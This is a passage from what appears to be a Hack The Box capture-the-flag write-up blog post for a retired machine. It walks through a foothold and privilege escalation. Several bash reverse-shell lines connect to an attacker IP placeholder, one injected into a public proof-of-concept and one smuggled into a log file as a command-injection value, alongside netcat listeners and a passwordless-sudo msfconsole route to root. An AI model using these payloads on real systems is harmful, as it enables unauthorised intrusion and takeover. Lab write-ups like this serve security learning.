GitHub.</div><div class="kg-bookmark-metadata"><amp-img class="kg-bookmark-icon" src="https://github.githubassets.com/favicons/favicon.svg" width="32" height="32" layout="fixed"></amp-img><span class="kg-bookmark-author">GitHub</span><span class="kg-bookmark-publisher">justinsteven</span></div></div><div class="kg-bookmark-thumbnail"><amp-img src="https://opengraph.githubassets.com/8c6db3fce370680f2d6801ff0e9c896e8f6576d1cd8f78dc042d7edd8404b3af/justinsteven/advisories" width="1200" height="600" layout="responsive"></amp-img></div></a></figure><p>First go the POC section and copy that to a file in our host machine.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-248.png" class="kg-image" width="1381" height="622" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-248.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-248.png 1000w, https://h4rithd.com/blog/content/images/2021/06/image-248.png 1381w" layout="responsive"></amp-img></figure><p>After that, read the POC line by line. It is written in <strong>python3</strong> and you are not a kiddie right?  Read the code line by line, understand it and come back.</p><p>The code contains the payload section itself. We only have to replace that payload. See how cheap it is?</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-249.png" class="kg-image" width="1654" height="554" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-249.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-249.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2021/06/image-249.png 1600w, https://h4rithd.com/blog/content/images/2021/06/image-249.png 1654w" layout="responsive"></amp-img></figure><p>Now it's time to load the gun. Simply says, time to create the payload. Since we need a reverse shell I will go and create the bash reverse shell to replace the payload section. Follow the code line below 👇👇</p><pre><code class="language-bash">/bin/bash -c \"/bin/bash -i &gt;&amp; /dev/tcp/&lt;YourIP&gt;/4545 0&gt;&amp;1\"</code></pre><p>Final exploit will look like this.👇👇 Please note to replace <strong>YourIP </strong>as yours.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-250.png" class="kg-image" width="1684" height="554" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-250.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-250.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2021/06/image-250.png 1600w, https://h4rithd.com/blog/content/images/2021/06/image-250.png 1684w" layout="responsive"></amp-img></figure><blockquote>📢📢 <em>Let me introduce my Reverse shell generator for HTB. Click <a href="https://github.com/h4rithd/RevSh3ll-HTB?ref=192.168.184.133" rel="noopener noreferrer"><em>here</em></a> to check how awful it is.</em></blockquote><p>Is everything fine?? Let's compile the code. I will use python3 because the code was written in python3. 😜😜</p><pre><code class="language-bash">python3 exploit.py</code></pre><p>Here we have our loaded weapon. 🔫🔫</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-251.png" class="kg-image" width="2560" height="956" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-251.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-251.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2021/06/image-251.png 1600w, https://h4rithd.com/blog/content/images/size/w2400/2021/06/image-251.png 2400w" layout="responsive"></amp-img></figure><p>After you run the exploit, usually the payload APK file will be stored in <code>/tmp</code> directory.  I copied it to the Download directory because, it will be easy for me to browse and select the file. I don't know what is your fav directory so go and copy that f*#$ing APK file to whatever directory you want. 😠😠</p><p>Also, don't forget to power up netcat listener.😁😁</p><pre><code class="language-bash">nc -lvnp 4545</code></pre><p>Now go to the web browser again and go to the payload section too.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-252.png" class="kg-image" width="597" height="322" layout="responsive"></amp-img></figure><p>After doing all the above things, click generate button. Are you listening trough netcat my mate? Look what we got.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-253.png" class="kg-image" width="1730" height="662" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-253.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-253.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2021/06/image-253.png 1600w, https://h4rithd.com/blog/content/images/2021/06/image-253.png 1730w" layout="responsive"></amp-img></figure><hr></hr><h2 id="03-privilege-escalation"><strong>03. Privilege Escalation</strong></h2><p>First of all I search around <code>.ssh</code> directory. And it has only <code>authorized_keys</code> left which means you can create SSH key pair using <code>ssh-keygen</code> , then upload the public key to the <code>authorized_keys</code> file. And then you can use SSH to login as user <code>kid</code> by using your private key. But I'm not going to do it here. 😁😁😁</p><p>After doing some enumerations I found a fancy script called <code>scanlosers.sh</code> in <code>/home/pwn</code> directory and it is also owned by the user <code>pwn</code>. By looking at the permission on the file, definitely we can't write anything to that file too.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-254.png" class="kg-image" width="1684" height="772" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-254.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-254.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2021/06/image-254.png 1600w, https://h4rithd.com/blog/content/images/2021/06/image-254.png 1684w" layout="responsive"></amp-img></figure><p>Let's open that file.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-255.png" class="kg-image" width="1644" height="662" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-255.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-255.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2021/06/image-255.png 1600w, https://h4rithd.com/blog/content/images/2021/06/image-255.png 1644w" layout="responsive"></amp-img></figure><p>By analyzing the script and debugging the code line by line, (Actually here I copied that <code>scanlosers.sh</code> file to my host machine and also created the <code>hackers</code> file in my local system. Then I tried to take the advantage using <code>hackers</code> file. Because in this scenario we can write things only to <code>hackers</code> file) I found the exact way to get reverse shell as the user <strong><code>pwn</code></strong> . Now go and check the file permission on <code>hackers</code> file. You'll see that we can write anything to that file.</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-256.png" class="kg-image" width="1384" height="332" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-256.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-256.png 1000w, https://h4rithd.com/blog/content/images/2021/06/image-256.png 1384w" layout="responsive"></amp-img></figure><p>So here is my payload.👇🏿👇🏿</p><pre><code class="language-bash">echo "h4rithd  ;/bin/bash -c 'bash -i &gt;&amp; /dev/tcp/&lt;YourIP&gt;/7878 0&gt;&amp;1' #" &gt;&gt; /home/kid/logs/hackers</code></pre><p>Please note that you must give a double space between <code>h4rithd</code> and <code>;</code> mark. Again change <strong>YourIP </strong>as yours. Before going to execute that command, open a new terminal and start the netcat listener again on port <code>7878</code>. 😎😎</p><pre><code class="language-bash"> nc -lvnp 7878</code></pre><p>After all, execute above payload and wait for the reverse shell. 🥱🥱🥱</p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-257.png" class="kg-image" width="2560" height="294" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-257.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-257.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2021/06/image-257.png 1600w, https://h4rithd.com/blog/content/images/size/w2400/2021/06/image-257.png 2400w" layout="responsive"></amp-img></figure><p>But mate, if you are in a busy environment, I mean, if so many users are using the box at the same time that you are using this, the payload won't work quickly. So... you'd better go, sip some coffee☕ and try again afterwards</p><p>In a short time, we got reverse shell as user <strong><code>pwn</code> </strong>. 😎😎😎 And if you are familiar in Privilege Escalation you already know what the next command is. Usually it is <code>sudo -l</code></p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-258.png" class="kg-image" width="1940" height="846" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-258.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-258.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2021/06/image-258.png 1600w, https://h4rithd.com/blog/content/images/2021/06/image-258.png 1940w" layout="responsive"></amp-img></figure><p>If you don't have enough knowledge on <code>sudo</code> commands, check <a href="https://www.explainshell.com/explain?cmd=sudo+-l&amp;ref=192.168.184.133" rel="noopener noreferrer">explainshell.com</a> It will explain every shell command in a pretty nice way. Here is for <code>sudo -l</code></p><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-259.png" class="kg-image" width="1387" height="484" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-259.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-259.png 1000w, https://h4rithd.com/blog/content/images/2021/06/image-259.png 1387w" layout="responsive"></amp-img></figure><p>Nevertheless, we can simply say that we can use <code>/opt/metasploit-framework-6.0.9/msfconsole</code> with super user (sudo) permission without asking a password. 😉😉 Let's try, type the following command and hit enter.</p><pre><code class="language-bash">sudo /opt/metasploit-framework-6.0.9/msfconsole
sudo cat /root/root.txt</code></pre><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-260.png" class="kg-image" width="2166" height="1658" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-260.png 600w, https://h4rithd.com/blog/content/images/size/w1000/2021/06/image-260.png 1000w, https://h4rithd.com/blog/content/images/size/w1600/2021/06/image-260.png 1600w, https://h4rithd.com/blog/content/images/2021/06/image-260.png 2166w" layout="responsive"></amp-img></figure><p>Wollah !!! We got the root flag. 😎😎👑👑</p><figure class="kg-card kg-image-card"><amp-anim src="https://h4rithd.com/blog/content/images/2021/06/f5d65a923b43647a6bd917578031627e.gif" class="kg-image" width="499" height="207" layout="responsive"></amp-anim></figure><figure class="kg-card kg-image-card"><amp-img src="https://h4rithd.com/blog/content/images/2021/06/image-262.png" class="kg-image" width="832" height="749" srcset="https://h4rithd.com/blog/content/images/size/w600/2021/06/image-262.png 600w, https://h4rithd.com/blog/content/images/2021/06/image-262.png 832w" layout="responsive"></amp-img></figure><p>Okay... I’ll see you on the next retired machine!  Stay connected... 🙋‍♂️🙋‍♂️</p><p><strong>Find me on <a href="https://twitter.com/h4rithd?ref=192.168.184.133" rel="noreferrer">@twitter</a></strong> </p>

            </section>

        </article>
    </main>
    <footer class="page-footer">
            <amp-img class="site-icon" src="https://h4rithd.com/blog/content/images/2021/06/favicon.ico" width="50" height="50" layout="fixed" alt="h4rithd.com"></amp-img>
        <h3>h4rithd.com</h3>
            <p>- Penetration Tester | Ethical Hacker | Security Researcher -</p>
        <p><a href="../../index.html">Read more posts →</a></p>
        <a class="powered" href="https://ghost.org" target="_blank" rel="noopener"><svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 156 156"><g fill="none" fill-rule="evenodd"><rect fill="#15212B" width="156" height="156" rx="27"/><g transform="translate(36 36)" fill="#F6F8FA"><path d="M0 71.007A4.004 4.004 0 014 67h26a4 4 0 014 4.007v8.986A4.004 4.004 0 0130 84H4a4 4 0 01-4-4.007v-8.986zM50 71.007A4.004 4.004 0 0154 67h26a4 4 0 014 4.007v8.986A4.004 4.004 0 0180 84H54a4 4 0 01-4-4.007v-8.986z"/><rect y="34" width="84" height="17" rx="4"/><path d="M0 4.007A4.007 4.007 0 014.007 0h41.986A4.003 4.003 0 0150 4.007v8.986A4.007 4.007 0 0145.993 17H4.007A4.003 4.003 0 010 12.993V4.007z"/><rect x="67" width="17" height="17" rx="4"/></g></g></svg> Published with Ghost</a>
    </footer>
    
</body>
</html>
